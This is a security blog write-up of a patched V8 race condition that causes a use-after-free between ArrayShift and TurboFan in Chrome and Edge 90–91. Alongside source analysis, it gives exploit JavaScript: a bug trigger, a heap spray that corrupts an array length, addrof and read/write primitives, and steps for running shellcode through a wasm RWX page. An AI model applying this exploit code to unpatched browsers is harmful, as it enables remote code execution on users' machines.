By Javier Jimenez

Overview

This post describes a method of exploiting a race condition in the V8 JavaScript engine, version 9.1.269.33. The vulnerability affects the following versions of Chrome and Edge:

- Google Chrome versions between 90.0.4430.0 and 91.0.4472.100.

- Microsoft Edge versions between 90.0.818.39 and 91.0.864.41.



The vulnerability occurs when one of the TurboFan jobs generates a handle to an object that is being modified at the same time by the ArrayShift built-in, resulting in a use-after-free (UaF) vulnerability. Unlike traditional UaFs, this vulnerability occurs within garbage-collected memory (UaF-gc). The bug lies within the ArrayShift built-in, as it lacks the necessary checks to prevent modifications on objects while other TurboFan jobs are running.

This post assumes the reader is familiar with all the elementary concepts needed to understand V8 internals and general exploitation. The references section contains links to blogs and documentation that describe prerequisite concepts such as TurboFan, Generational Garbage Collection, and V8 JavaScript Objects’ in-memory representation.

The Vulnerability

When the ArrayShift built-in is called on an array object via Array.prototype.shift(), the length and starting address of the array may be changed while a compilation and optimization (TurboFan) job in the Inlining phase executes concurrently. When TurboFan reduces an element access of this array in the form of array[0], the function ReduceElementLoadFromHeapConstant() is executed on a different thread. This element access points to the address of the array being shifted via the ArrayShift built-in. If the ReduceElementLoadFromHeapConstant() function runs just before the shift operation is performed, it results in a dangling pointer. This is because Array.prototype.shift() “frees” the object to which the compilation job still “holds” a reference. Neither “free” nor “hold” is a fully accurate term in this garbage collection context, but they serve the purpose of explaining the vulnerability conceptually. Later we describe these actions more accurately as “creating a filler object” and “creating a handle” respectively.

ReduceElementLoadFromHeapConstant() is a function that is called when TurboFan tries to optimize code that loads a value from the heap, such as array[0]. Below is an example of such code:

function main() {

let arr = new Array(500).fill(1.1);

function load_elem() {

let value = arr[0];

for (let v19 = 0; v19 < 1500; v19++) {}

}

for (let i = 0; i < 500; i++) {

load_elem();

}

}

main();

By running the code above in the d8 shell with the command ./d8 --trace-turbo-reduction, we observe that the JSNativeContextSpecialization optimization, to which the ReduceElementLoadFromHeapConstant() function belongs, kicks in on node #27, taking node #57 as its first input. Node #57 is the node for the array arr:

$ ./d8 --trace-opt --trace-turbo-reduction /tmp/loadaddone.js

[TRUNCATED]

- Replacement of #13: JSLoadContext[0, 2, 1](3, 7) with #57: HeapConstant[0x234a0814848d <JSArray[500]>] by reducer JSContextSpecialization

- Replacement of #27: JSLoadProperty[sloppy, FeedbackSource(#0)](57, 23, 4, 3, 28, 24, 22) with #64: CheckFloat64Hole[allow-return-hole, FeedbackSource(INVALID)](63, 63, 22) by reducer JSNativeContextSpecialization

[TRUNCATED]

Therefore, executing the Array.prototype.shift() method on the same array, arr, during the execution of the aforementioned TurboFan job may trigger the vulnerability. Since this is a race condition, the vulnerability may not trigger reliably. The reliability depends on the resources available for the V8 engine to use.

The following is a minimal JavaScript test case that triggers a debug check on a debug build of d8:

function main() {

let arr = new Array(500).fill(1.1);

function bug() {

// [1]

let a = arr[0];

// [2]

arr.shift();

for (let v19 = 0; v19 < 1500; v19++) {}

}

// [3]

for (let i = 0; i < 500; i++) {

bug();

}

}

main();

The loop at [3] triggers the compilation of the bug() function since it’s a “hot” function. This starts a concurrent compilation job for the function where [1] will force a call to ReduceElementLoadFromHeapConstant(), to reduce the load at index 0 for a constant value. While TurboFan is running on a different thread, the main thread executes the shift operation on the same array [2], modifying it. However, this minimized test case does not trigger anything further than an assertion (via DCHECK) on debug builds. Although the test case executes without fault on a release build, it is sufficient to understand the rest of the analysis.

The following numbered steps show the order of execution of code that results in the use-after-free. The end result, at step 8, is the TurboFan thread pointing to a freed object:

In order to achieve a dangling pointer, let’s figure out how each thread holds a reference in V8’s code.

Reference from the TurboFan Thread

Once the TurboFan job is fired, the following code will get executed:

// src/compiler/js-native-context-specialization.cc

Reduction JSNativeContextSpecialization::ReduceElementLoadFromHeapConstant(

Node* node, Node* key, AccessMode access_mode,

KeyedAccessLoadMode load_mode) {

[TRUNCATED]

HeapObjectMatcher mreceiver(receiver);

HeapObjectRef receiver_ref = mreceiver.Ref(broker());

[TRUNCATED]

[1]

NumberMatcher mkey(key);

if (mkey.IsInteger() &&

mkey.IsInRange(0.0, static_cast<double>(JSObject::kMaxElementIndex))) {

STATIC_ASSERT(JSObject::kMaxElementIndex <= kMaxUInt32);

const uint32_t index = static_cast<uint32_t>(mkey.ResolvedValue());

base::Optional<ObjectRef> element;

if (receiver_ref.IsJSObject()) {

[2]

element = receiver_ref.AsJSObject().GetOwnConstantElement(index);

[TRUNCATED]

Since this reduction is done via ReducePropertyAccess() there is an initial check at [1] to know whether the access to be reduced is actually in the form of an array index access and whether the receiver is a JavaScript object. After that is verified, the GetOwnConstantElement() method is called on the receiver object at [2] to retrieve a constant element from the calculated index.

// src/compiler/js-heap-broker.cc

base::Optional<ObjectRef> JSObjectRef::GetOwnConstantElement(

uint32_t index, SerializationPolicy policy) const {

[3]

if (data_->should_access_heap() || FLAG_turbo_direct_heap_access) {

[TRUNCATED]

[4]

base::Optional<FixedArrayBaseRef> maybe_elements_ref = elements();

[TRUNCATED]

The code at [3] verifies whether the current caller should access the heap. The verification passes since the reduction is for loading an element from the heap. The flag FLAG_turbo_direct_heap_access is enabled by default. Then, at [4] the elements() method is called with the intention of obtaining a reference to the elements of the receiver object (the array). The elements() method is shown below:

// src/compiler/js-heap-broker.cc

base::Optional<FixedArrayBaseRef> JSObjectRef::elements() const {

if (data_->should_access_heap()) {

[5]

return FixedArrayBaseRef(

broker(), broker()->CanonicalPersistentHandle(object()->elements()));

}

[TRUNCATED]

// File: src/objects/js-objects-inl.h

DEF_GETTER(JSObject, elements, FixedArrayBase) {

return TaggedField<FixedArrayBase, kElementsOffset>::load(cage_base, *this);

}

Further down the call stack, elements() will call CanonicalPersistentHandle() with a reference to the elements of the receiver object, denoted by object()->elements() at [5]. This elements() call differs from the previous one: it directly accesses the heap and returns the pointer within the V8 heap. It accesses the same object in memory as the ArrayShift built-in.

Finally, CanonicalPersistentHandle() will create a Handle reference. Handles in V8 are objects that are exposed to the JavaScript environment. The most notable property is that they are tracked by the garbage collector.

// File: src/compiler/js-heap-broker.h

template <typename T>

Handle<T> CanonicalPersistentHandle(T object) {

if (canonical_handles_) {

[TRUNCATED]

} else {

[6]

return Handle<T>(object, isolate());

}

}

The Handle created at [6] is now exposed to the JavaScript environment and a reference is held while the compilation job is being executed. At this point, if any other parts of the process modify the reference, for example, forcing a free on it, the TurboFan job will hold a dangling pointer. Exploiting the vulnerability relies on this behavior. In particular, knowing the precise point when the TurboFan job runs allows us to keep the bogus pointer within our reach.

Reference from the Main Thread (ArrayShift Built-in)

Once the code depicted in the previous section is running and it passes the point where the Handle to the array was created, executing the ArrayShift JavaScript function on the same array triggers the vulnerability. The following code is executed:

// File: src/builtins/builtins-array.cc

BUILTIN(ArrayShift) {

HandleScope scope(isolate);

// 1. Let O be ? ToObject(this value).

Handle<JSReceiver> receiver;

[1]

ASSIGN_RETURN_FAILURE_ON_EXCEPTION(

isolate, receiver, Object::ToObject(isolate, args.receiver()));

[TRUNCATED]

if (CanUseFastArrayShift(isolate, receiver)) {

[2]

Handle<JSArray> array = Handle<JSArray>::cast(receiver);

return *array->GetElementsAccessor()->Shift(array);

}

[TRUNCATED]

}

At [1], the receiver object (arr in the original JavaScript test case) is assigned to the receiver variable via the ASSIGN_RETURN_FAILURE_ON_EXCEPTION macro. It then uses this receiver variable [2] to create a new Handle of the JSArray type in order to call the Shift() function on it.

Conceptually, the shift operation on an array performs the following modifications to the array in the V8 heap:

Two things change in memory: the pointer that denotes the start of the array is incremented, and the first element is overwritten by a filler object (which we referred to as “freed”). The filler is a special type of object described further below. With this picture in mind, we can continue the analysis with a clear view of what is happening in the code.

Prior to any manipulations of the array object, the following function calls are executed, passing the array (now of Handle<JSArray> type) as an argument:

// File: src/objects/elements.cc

Handle<Object> Shift(Handle<JSArray> receiver) final {

[3]

return Subclass::ShiftImpl(receiver);

}

[TRUNCATED]

static Handle<Object> ShiftImpl(Handle<JSArray> receiver) {

[4]

return Subclass::RemoveElement(receiver, AT_START);

}

[TRUNCATED]

static Handle<Object> RemoveElement(Handle<JSArray> receiver,

Where remove_position) {

[TRUNCATED]

[5]

Handle<FixedArrayBase> backing_store(receiver->elements(), isolate);

[TRUNCATED]

if (remove_position == AT_START) {

[6]

Subclass::MoveElements(isolate, receiver, backing_store, 0, 1, new_length,

0, 0);

}

[TRUNCATED]

}

Shift() at [3] simply calls ShiftImpl(). Then, ShiftImpl() at [4] calls RemoveElement(), passing the index as a second argument within the AT_START variable. This is to depict the shift operation, reminding us that it deletes the first object (index position 0) of an array.

Within the RemoveElement() function, the elements() function from the src/objects/js-objects-inl.h file is called again on the same receiver object and a Handle is created and stored in the backing_store variable. At [5] we see how the reference to the same object as the previous TurboFan job is created.

Finally, a call to MoveElements() is made [6] in order to perform the shift operation.

// File: src/objects/elements.cc

static void MoveElements(Isolate* isolate, Handle<JSArray> receiver,

Handle<FixedArrayBase> backing_store, int dst_index,

int src_index, int len, int hole_start,

int hole_end) {

DisallowGarbageCollection no_gc;

[7]

BackingStore dst_elms = BackingStore::cast(*backing_store);

if (len > JSArray::kMaxCopyElements && dst_index == 0 &&

[8]

isolate->heap()->CanMoveObjectStart(dst_elms)) {

dst_elms = BackingStore::cast(

[9]

isolate->heap()->LeftTrimFixedArray(dst_elms, src_index));

[TRUNCATED]

In MoveElements(), the variables dst_index and src_index hold the values 0 and 1 respectively, since the shift operation will shift all the elements of the array from index 1, and place them starting at index 0, effectively removing position 0 of the array. It starts by casting the backing_store variable to a BackingStore object and storing it in the dst_elms variable [7]. This is done to execute the CanMoveObjectStart() function, which checks whether the array can be moved in memory [8].

This check function is where the vulnerability resides. The function does not check whether other compilation jobs are running. If the check passes, dst_elms (the reference to the elements of the target array) is passed to LeftTrimFixedArray(), which modifies it.

// File: src/heap/heap.cc

[10]

bool Heap::CanMoveObjectStart(HeapObject object) {

if (!FLAG_move_object_start) return false;

// Sampling heap profiler may have a reference to the object.

if (isolate()->heap_profiler()->is_sampling_allocations()) return false;

if (IsLargeObject(object)) return false;

// We can move the object start if the page was already swept.

return Page::FromHeapObject(object)->SweepingDone();

}

In a vulnerable V8 version, the CanMoveObjectStart() function at [10] checks for things such as the profiler holding references to the object or the object being a large object, but it does not contain any checks for concurrent compilation jobs. Therefore all checks pass and the function returns true, leading to the LeftTrimFixedArray() function call with dst_elms as the first argument.

// File: src/heap/heap.cc

FixedArrayBase Heap::LeftTrimFixedArray(FixedArrayBase object,

int elements_to_trim) {

[TRUNCATED]

const int element_size = object.IsFixedArray() ? kTaggedSize : kDoubleSize;

const int bytes_to_trim = elements_to_trim * element_size;

[TRUNCATED]

[11]

// Calculate location of new array start.

Address old_start = object.address();

Address new_start = old_start + bytes_to_trim;

[TRUNCATED]

[12]

CreateFillerObjectAt(old_start, bytes_to_trim,

MayContainRecordedSlots(object)

? ClearRecordedSlots::kYes

: ClearRecordedSlots::kNo);

[TRUNCATED]

#ifdef ENABLE_SLOW_DCHECKS

if (FLAG_enable_slow_asserts) {

// Make sure the stack or other roots (e.g., Handles) don't contain pointers

// to the original FixedArray (which is now the filler object).

SafepointScope scope(this);

LeftTrimmerVerifierRootVisitor root_visitor(object);

ReadOnlyRoots(this).Iterate(&root_visitor);

[13]

IterateRoots(&root_visitor, {});

}

#endif // ENABLE_SLOW_DCHECKS

[TRUNCATED]

}

At [11] the address of the object, given as the first argument to the function, is stored in the old_start variable. The address is then used to create a Filler object at [12]. Fillers, in garbage collection, are a special type of object that denotes a free space without actually freeing it, ensuring that there is a contiguous space of objects for a garbage collection cycle to iterate over. Regardless, a Filler object denotes a free space that can later be reclaimed by other objects. Therefore, since the compilation job also has a reference to this object’s address, the optimization job now points to a Filler object which, after a garbage collection cycle, will be a dangling pointer.
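The address arithmetic at [11] and the filler creation at [12] can be illustrated with a toy model. This is only a sketch: a Map from address to label stands in for the V8 heap, the addresses are made up, and kTaggedSize = 4 assumes pointer compression is enabled. None of this is V8 code.

```javascript
// Toy model only: a Map from address to a label stands in for the V8 heap.
const kTaggedSize = 4; // assumption: pointer compression enabled
const kDoubleSize = 8;

function leftTrim(heap, oldStart, elementsToTrim, isFixedArray) {
  const elementSize = isFixedArray ? kTaggedSize : kDoubleSize;
  const bytesToTrim = elementsToTrim * elementSize;
  const newStart = oldStart + bytesToTrim;
  // The backing store now begins at the new start...
  heap.set(newStart, heap.get(oldStart));
  // ...and the old start becomes a filler covering the trimmed bytes.
  heap.set(oldStart, `filler(${bytesToTrim} bytes)`);
  return newStart;
}

const heap = new Map([[0x1000, "FixedArray elements of arr"]]);
const compilerHandle = 0x1000; // address captured by the compilation job
const mainThreadStart = leftTrim(heap, 0x1000, 1, true);

console.log(mainThreadStart.toString(16)); // 1004
console.log(heap.get(compilerHandle));     // filler(4 bytes)
```

In this model the main thread continues with the new start address, while the address captured earlier by the compilation job now refers to the filler.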

For completeness, the marker at [13] shows the place where debug builds would bail out. The IterateRoots() function takes a variable created from the initial object (dst_elms) as an argument, which is now a Filler, and checks whether any other part of V8 is holding a reference to it. If a running compilation job holds such a reference, this function will crash the process on debug builds.

Exploitation

Exploiting this vulnerability involves the following steps:

- Triggering the vulnerability by creating an Array barr and forcing a compilation job at the same time as the ArrayShift built-in is called.

- Triggering a garbage collection cycle in order to reclaim the freed memory with Array-like objects, so that it is possible to corrupt their length.

- Locating the corrupted array and a marker object to construct the addrof, read, and write primitives.

- Creating and instantiating a wasm instance with an exported main function, then overwriting the main exported function’s shellcode.

- Finally, calling the exported main function, running the previously overwritten shellcode.

After reclaiming memory, there’s the need to find certain markers in memory, as the objects that reclaim memory might land at different offsets every time. Due to this, should the exploit fail to reproduce, it needs to be restarted to either win the race or correctly find the objects in the reclaimed space. The possible causes of failure are losing the race condition or the spray not being successful at placing objects where they’re needed.

Triggering the Vulnerability

Again, let’s start with a test case that triggers an assert in debug builds. The following JavaScript code triggers the vulnerability, crashing the engine on debug builds via a DCHECK_NE statement:

function trigger() {

[1]

let buggy_array_size = 120;

let PUSH_OBJ = [324];

let barr = [1.1];

for (let i = 0; i < buggy_array_size; i++) barr.push(PUSH_OBJ);

function dangling_reference() {

[2]

barr.shift();

for (let i = 0; i < 10000; i++) { console.i += 1; }

let a = barr[0];

[3]

function gcing() {

const v15 = new Uint8ClampedArray(buggy_array_size*0x400000);

}

let gcit = gcing();

for (let v19 = 0; v19 < 500; v19++) {}

}

[4]

for (let i = 0; i < 4; i++) {

dangling_reference();

}

}

trigger();

Triggering the vulnerability comprises the following steps:

- At [1] an array barr is created by pushing objects PUSH_OBJ into it. These serve as a marker at later stages.

- At [2] the bug is triggered by performing the shift on the barr array. A for loop triggers the compilation early, and a value from the array is loaded to trigger the right optimization reduction.

- At [3] the gcing() function is responsible for triggering a garbage collection after each iteration. When the vulnerability is triggered, the reference to barr is freed. A dangling pointer is then held at this point.

- At [4] the function to be optimized must stop executing exactly on the iteration in which it gets optimized. The concurrent reference to the Filler object is obtained only at this iteration.

Reclaiming Memory and Corrupting an Array Length

The next excerpt of the code explains how the freed memory is reclaimed by the desired arrays in the full exploit. The goal of the following code is to get the elements of barr to point to the tmpfarr and tmpMarkerArray objects in memory, so that the length can be corrupted to finally build the exploit primitives.

The above image shows how the elements of the barr array are altered throughout the exploit. We can see how, in the last state, barr's elements point to the in-memory JSObjects tmpfarr and tmpMarkerArray, which allows corrupting their lengths via statements like barr[2] = 0xffff. Bear in mind that the images are not comprehensive. JSObjects represented in memory contain fields, such as Map or array length, that are not shown in the above image. Refer to the References section for details on complete structures.

let size_to_search = 0x8c;

let next_size_to_search = size_to_search+0x60;

let arr_search = [];

let tmparr = new Array(Math.floor(size_to_search)).fill(9.9);

let tmpMarkerArray = new Array(next_size_to_search).fill({

a: placeholder_obj, b: placeholder_obj, notamarker: 0x12341234, floatprop: 9.9

});

let tmpfarr= [...tmparr];

let new_corrupted_length = 0xffff;

for (let v21 = 0; v21 < 10000; v21++) {

[1]

arr_search.push([...tmpMarkerArray]);

arr_search.push([...tmpfarr]);

[2]

if (barr[0] != PUSH_OBJ) {

for (let i = 0; i < 100; i++) {

[3]

if (barr[i] == size_to_search) {

[4]

if (barr[i+12] != next_size_to_search) continue;

[5]

barr[i] = new_corrupted_length;

break;

}

}

break;

}

}

for (let i = 0; i < arr_search.length; i++) {

[6]

if (arr_search[i]?.length == new_corrupted_length) {

return [arr_search[i], {

a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337

}];

}

}

The following list describes how the above code alters barr's elements as shown in the previous figure.

- Within a loop at [1], several arrays are pushed into another array with the intention of reclaiming the previously freed memory. These actions trigger garbage collection, so that when the memory is freed, the object is moved and overwritten by the desired arrays (tmpfarr and tmpMarkerArray).

- The check at [2] observes that the array no longer contains any of the initial values pushed. This means that the vulnerability has been triggered correctly and barr now points to some other part of memory.

- The intention of the check at [3] is to identify the array element that holds the length of the tmpfarr array.

- The check at [4] verifies that the adjacent object has the length for tmpMarkerArray.

- The length of the tmpfarr is then overwritten at [5] with a large value, so that it can be used to craft the exploit primitives.

- Finally at [6], a search for the corrupted array object is performed by querying for the new corrupted length via the JavaScript length property. One thing to note is the optional chaining operator ?. which is needed here because arr_search[i] might be an undefined value without the length property, breaking JavaScript execution. Once found, the corrupted array is returned.
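The role of optional chaining in the search at [6] can be seen in isolation with a small sketch. The candidates array and the findByLength helper are hypothetical stand-ins for arr_search and the search loop, not part of the exploit.

```javascript
// Made-up stand-in for arr_search: one slot is undefined.
const candidates = [[1, 2, 3], undefined, new Array(0xffff)];
const wanted = 0xffff;

function findByLength(list, length) {
  for (let i = 0; i < list.length; i++) {
    // list[i]?.length evaluates to undefined instead of throwing a TypeError
    // when list[i] is undefined or null.
    if (list[i]?.length === length) return i;
  }
  return -1;
}

console.log(findByLength(candidates, wanted)); // 2
```

Without the ?. operator, the loop would throw on the undefined slot before reaching the array with the matching length.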

Creating and Locating the Marker Object

Once the length of an array has been corrupted, it allows reading and writing out-of-bounds within the V8 heap. Certain constraints apply, as reading too far could cause the exploit to fail. Therefore a cleaner way to read-write within the V8 heap and to implement exploit primitives such as addrof is needed.

[1]

for (let i = size_to_search; i < new_corrupted_length/2; i++) {

[2]

for (let spray = 0; spray < 50; spray++) {

let local_findme = {

a: placeholder_obj, b: placeholder_obj, findme: 0x11111111, floatprop: 1.337, findyou:0x12341234

};

objarr.push(local_findme);

function gcing() {

const v15 = new String("Hello, GC!");

}

gcing();

}

if (marker_idx != -1) break;

[3]

if (f2string(cor_farr[i]).includes("22222222")){

print(`Marker at ${i} => ${f2string(cor_farr[i])}`);

let aux_ab = new ArrayBuffer(8);

let aux_i32_arr = new Uint32Array(aux_ab);

let aux_f64_arr = new Float64Array(aux_ab);

aux_f64_arr[0] = cor_farr[i];

[4]

if (aux_i32_arr[0].toString(16) == "22222222") {

aux_i32_arr[0] = 0x44444444;

} else {

aux_i32_arr[1] = 0x44444444;

}

cor_farr[i] = aux_f64_arr[0];

[5]

for (let j = 0; j < objarr.length; j++) {

if (objarr[j].findme != 0x11111111) {

leak_obj = objarr[j];

if (leak_obj.findme != 0x11111111) {

print(`Found right marker at ${i}`);

marker_idx = i;

break;

}

}

}

break;

}

}

- A for loop [1] traverses the array with corrupted length cor_farr. Note that this is one of the parts of potential failure in the exploit. Traversing too far into the corrupted array will likely result in a crash due to reading past the boundaries of the memory page. Thus, the value new_corrupted_length/2 was selected at the time of development after several tests.

- Before starting to traverse the corrupted array, a minimal memory spray is attempted at [2] in order to have the wanted local_findme object right in the memory pointed to by cor_farr. Furthermore, garbage collection is triggered in order to trigger compaction of the newly sprayed objects with the intention of making them adjacent to cor_farr elements.

- At [3] f2string converts the float value of cor_farr[i] to a string value. This is then checked against the value 22222222 because V8 represents small integers in memory with the last bit set to 0 by left shifting the actual value by one. So 0x11111111 << 1 == 0x22222222, which is the memory value of the small integer property local_findme.findme. Once the marker value is found, several “array views” (Typed Arrays) are constructed in order to change the 0x22222222 part and not the rest of the float value. This is done by creating a 32-bit view aux_i32_arr and a 64-bit view aux_f64_arr on the same buffer aux_ab.

- A check is performed at [4] to determine whether the marker is found in the upper or the lower 32 bits. Once determined, the value is changed to 0x44444444 by using the auxiliary array views.

- Finally at [5], the objarr array is traversed in order to find the changed marker and the index marker_idx is saved. This index and leak_obj are used to craft exploit primitives within the V8 heap.
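The post uses f2string() without showing its body. The following is a minimal sketch of what such a helper might look like, assuming it renders the raw 64 bits of a double as 16 hexadecimal digits on a little-endian machine. The smiEncode and makeDouble helpers and the value 0x0804a1b9 are hypothetical and exist only to illustrate the small integer encoding described at [3].

```javascript
// Hypothetical helper: the post calls f2string() but does not show its body.
// Assumption: it renders the raw 64 bits of a double as 16 hex digits.
function f2string(f) {
  const buf = new ArrayBuffer(8);
  new Float64Array(buf)[0] = f;
  const bits = new BigUint64Array(buf)[0];
  return bits.toString(16).padStart(16, "0");
}

// A small integer is stored shifted left by one, so its low tag bit is 0.
function smiEncode(value) {
  return (value << 1) >>> 0; // force an unsigned 32-bit result
}

// Build a double from two 32-bit halves (little-endian: index 0 is the low half).
function makeDouble(low32, high32) {
  const buf = new ArrayBuffer(8);
  const u32 = new Uint32Array(buf);
  u32[0] = low32;
  u32[1] = high32;
  return new Float64Array(buf)[0];
}

const tagged = smiEncode(0x11111111);          // 0x22222222
const sample = makeDouble(tagged, 0x0804a1b9); // 0x0804a1b9 is a made-up value
console.log(f2string(sample));
console.log(f2string(sample).includes("22222222"));
```

Reading object fields through a float array returns two adjacent 32-bit fields per element, which is why the marker can show up in either half of the hex string.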

Exploit Primitives

The following sections are common to most V8 exploits and are easily accessible from other write-ups. We describe these exploit primitives to explain the caveat of having to deal with the fact that the spray might have resulted in the objects being unaligned in memory.

Address of an Object

function v8h_addrof(obj) {

[1]

leak_obj.a = obj;

leak_obj.b = obj;

let aux_ab = new ArrayBuffer(8);

let aux_i32_arr = new Uint32Array(aux_ab);

let aux_f64_arr = new Float64Array(aux_ab);

[2]

aux_f64_arr[0] = cor_farr[marker_idx - 1];

[3]

if (aux_i32_arr[0] != aux_i32_arr[1]) {

aux_i32_arr[0] = aux_i32_arr[1]

}

let res = BigInt(aux_i32_arr[0]);

return res;

}

The above code presents the addrof primitive and consists of the following steps:

- First, at [1], the target object to leak is placed within the properties a and b of leak_obj and auxiliary array views are created in order to read from the corrupted array cor_farr.

- At [2], the properties are read from the corrupted array by subtracting one from the marker_idx. This is due to the leak_obj having the properties next to each other in memory; therefore a and b precede the findme property.

- By checking the upper and lower 32 bits of the read float value at [3], it is possible to tell whether the a and b values are aligned. In case they are not, it means that only the upper 32 bits of the float value contain the address of the target object. By assigning it back to index 0 of aux_i32_arr, the function is simplified and it is possible to just return the leaked value by always reading from the same index.
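The alignment check at [3] can be exercised on its own with made-up values. In this sketch, fromHalves and extractCompressedPointer are hypothetical helpers, the pointer value 0x0804a1b9 is invented, and a little-endian machine is assumed.

```javascript
// Build a double from two 32-bit halves (little-endian: index 0 is the low half).
function fromHalves(low32, high32) {
  const buf = new ArrayBuffer(8);
  const u32 = new Uint32Array(buf);
  u32[0] = low32;
  u32[1] = high32;
  return new Float64Array(buf)[0];
}

// `raw` stands in for the double read from the corrupted array.
function extractCompressedPointer(raw) {
  const buf = new ArrayBuffer(8);
  const f64 = new Float64Array(buf);
  const u32 = new Uint32Array(buf);
  f64[0] = raw;
  // Aligned: both halves hold the same pointer (properties a and b).
  // Unaligned: only the upper half is known to hold it.
  const aligned = u32[0] === u32[1];
  return { pointer: aligned ? u32[0] : u32[1], aligned };
}

const alignedRead = extractCompressedPointer(fromHalves(0x0804a1b9, 0x0804a1b9));
const unalignedRead = extractCompressedPointer(fromHalves(0x22222222, 0x0804a1b9));
console.log(alignedRead.pointer.toString(16), alignedRead.aligned);
console.log(unalignedRead.pointer.toString(16), unalignedRead.aligned);
```

Storing the same object in both a and b is what makes the comparison meaningful: two equal halves can only come from reading both properties at once.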

Reading and Writing on the V8 Heap

Depending on the architecture and on whether pointer compression is enabled (the default on 64-bit architectures), the exploit needs to read either a 32-bit tagged pointer (e.g. an object) or a full 64-bit address. The latter case applies only to 64-bit architectures, where the backing store of a Typed Array must be manipulated to build an arbitrary read and write primitive outside of the V8 heap boundaries.

Below we only present the 64-bit architecture read/write. Their 32-bit counterparts do the same, but with the restriction of reading the lower or higher 32-bit values of the leaked 64-bit float value.

function v8h_read64(v8h_addr_as_bigint) {

let ret_value = null;

let restore_value = null;

let aux_ab = new ArrayBuffer(8);

let aux_i32_arr = new Uint32Array(aux_ab);

let aux_f64_arr = new Float64Array(aux_ab);

let aux_bint_arr = new BigUint64Array(aux_ab);

[1]

aux_f64_arr[0] = cor_farr[marker_idx];

let high = aux_i32_arr[0] == 0x44444444;

[2]

if (high) {

restore_value = aux_f64_arr[0];

aux_i32_arr[1] = Number(v8h_addr_as_bigint-4n);

cor_farr[marker_idx] = aux_f64_arr[0];

} else {

aux_f64_arr[0] = cor_farr[marker_idx+1];

restore_value = aux_f64_arr[0];

aux_i32_arr[0] = Number(v8h_addr_as_bigint-4n);

cor_farr[marker_idx+1] = aux_f64_arr[0];

}

[3]

aux_f64_arr[0] = leak_obj.floatprop;

ret_value = aux_bint_arr[0];

cor_farr[high ? marker_idx : marker_idx+1] = restore_value;

return ret_value;

}

The 64-bit architecture read consists of the following steps:

- At [1], a check for alignment is done via the marker_idx: if the marker is found in the lower 32 bits via aux_i32_arr[0], it means that the leak_obj.floatprop property is in the upper 32 bits (aux_i32_arr[1]).

- Once alignment has been determined, next at [2] the address of the leak_obj.floatprop property is overwritten with the desired address provided by the argument v8h_addr_as_bigint. In addition, 4 bytes are subtracted from the target address because V8 will add 4 with the intention of skipping the map pointer to read the float value.

- At [3], the leak_obj.floatprop points to the target address in the V8 heap. By reading it through the property, it is possible to obtain 64-bit values as floats and make the conversion with the auxiliary arrays.

This function can also be used to write 64-bit values by adding a value to write as an extra argument and, instead of reading the property, writing to it.

function v8h_write64(what_as_bigint, v8h_addr_as_bigint) {

[TRUNCATED]

aux_bint_arr[0] = what_as_bigint;

leak_obj.floatprop = aux_f64_arr[0];

[TRUNCATED]

As mentioned at the beginning of this section, the only changes required to make these primitives work on 32-bit architectures are to use the provided auxiliary 32-bit array views such as aux_i32_arr and only write or read on the upper or lower 32-bit, as the following snippet shows:

[TRUNCATED]

aux_f64_arr[0] = leak_obj.floatprop;

ret_value = aux_i32_arr[0];

[TRUNCATED]
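The 4-byte adjustment used in v8h_read64 can be checked with a little address arithmetic. The sketch below rests on two assumptions that the post does not spell out: heap object pointers carry a tag of 1 in the low bit, and with pointer compression the boxed double consists of a 4-byte map word followed by the 8-byte value. The function names and the address are hypothetical.

```javascript
// Assumptions (not shown in the post): tagged pointers have the low bit set,
// and the double sits 4 bytes after the start of its box (after the map word).
const kHeapObjectTag = 1n;
const kValueOffset = 4n;

// Untagged address that is read when the double behind a tagged pointer is loaded.
function valueAddress(taggedPointer) {
  return taggedPointer - kHeapObjectTag + kValueOffset;
}

// Value to plant in the property slot so that the load starts at the first
// byte of the target (the same "- 4n" as in v8h_read64).
function pointerToPlant(taggedTarget) {
  return taggedTarget - 4n;
}

const taggedTarget = 0x0804a1b9n; // made-up tagged address
const planted = pointerToPlant(taggedTarget);
console.log(valueAddress(planted) === taggedTarget - kHeapObjectTag); // true
```

Under these assumptions, the subtraction cancels the offset that the engine adds, so the 8 bytes that are read begin exactly at the untagged target address.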

Using the Exploit Primitives to Run Shellcode

The following steps to run custom shellcode on 64-bit architectures are public knowledge, but are summarized here for the sake of completeness:

1. Create a wasm module that exports a function (e.g. main).

2. Create a wasm instance object WebAssembly.Instance.

3. Obtain the address of the wasm instance using the addrof primitive.

4. Read the 64-bit pointer within the V8 heap at the wasm instance plus 0x68. This will retrieve the pointer to a rwx page where we can write our shellcode to.

5. Now create a Typed Array of Uint8Array type.

6. Obtain its address via the addrof function.

7. Write the previously obtained pointer to the rwx page into the backing store of the Uint8Array, located 0x28 bytes from the Uint8Array address obtained in step 6.

8. Write your desired shellcode into the Uint8Array one byte at a time. This will effectively write into the rwx page.

9. Finally, call the main function exported in step 1.
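Steps 1, 2 and 9 use only the standard WebAssembly JavaScript API and can be sketched without any of the primitives. The post does not show its wasm module, so the byte sequence below is an assumption: a hand-assembled minimal module whose exported main function simply returns 42.

```javascript
// Assumed minimal module (not taken from the post): exports main() -> i32 42.
const wasmBytes = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,             // magic, version 1
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,                   // type: () -> i32
  0x03, 0x02, 0x01, 0x00,                                     // one function, type 0
  0x07, 0x08, 0x01, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00, // export "main"
  0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a, 0x0b,             // body: i32.const 42
]);

// Step 1: compile the module. Step 2: instantiate it.
const wasmModule = new WebAssembly.Module(wasmBytes);
const wasmInstance = new WebAssembly.Instance(wasmModule);

// Step 9: call the exported function.
const main = wasmInstance.exports.main;
console.log(main()); // 42
```

Synchronous compilation through the WebAssembly.Module constructor is acceptable here because the module is only a few bytes long.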

Conclusion

This vulnerability was made possible by a Feb 2021 commit that introduced direct heap reads for JSArrayRef, allowing for the retrieval of a handle. Furthermore, this bug would have flown under the radar if not for another commit in 2018 that introduced measures to crash when double references are held during shift operation on arrays. This vulnerability was patched in June 2021 by disabling left-trimming when concurrent compilation jobs are being executed.

The commits and their timeline show that it is not easy for developers to write secure code in a single go, especially in complex environments like JavaScript engines that also include fully-fledged optimizing compilers running concurrently.

We hope you enjoyed reading this. If you are hungry for more, make sure to check our other blog posts.

References

TurboFan definition – https://web.archive.org/web/20210325140355/https://v8.dev/blog/turbofan-jit

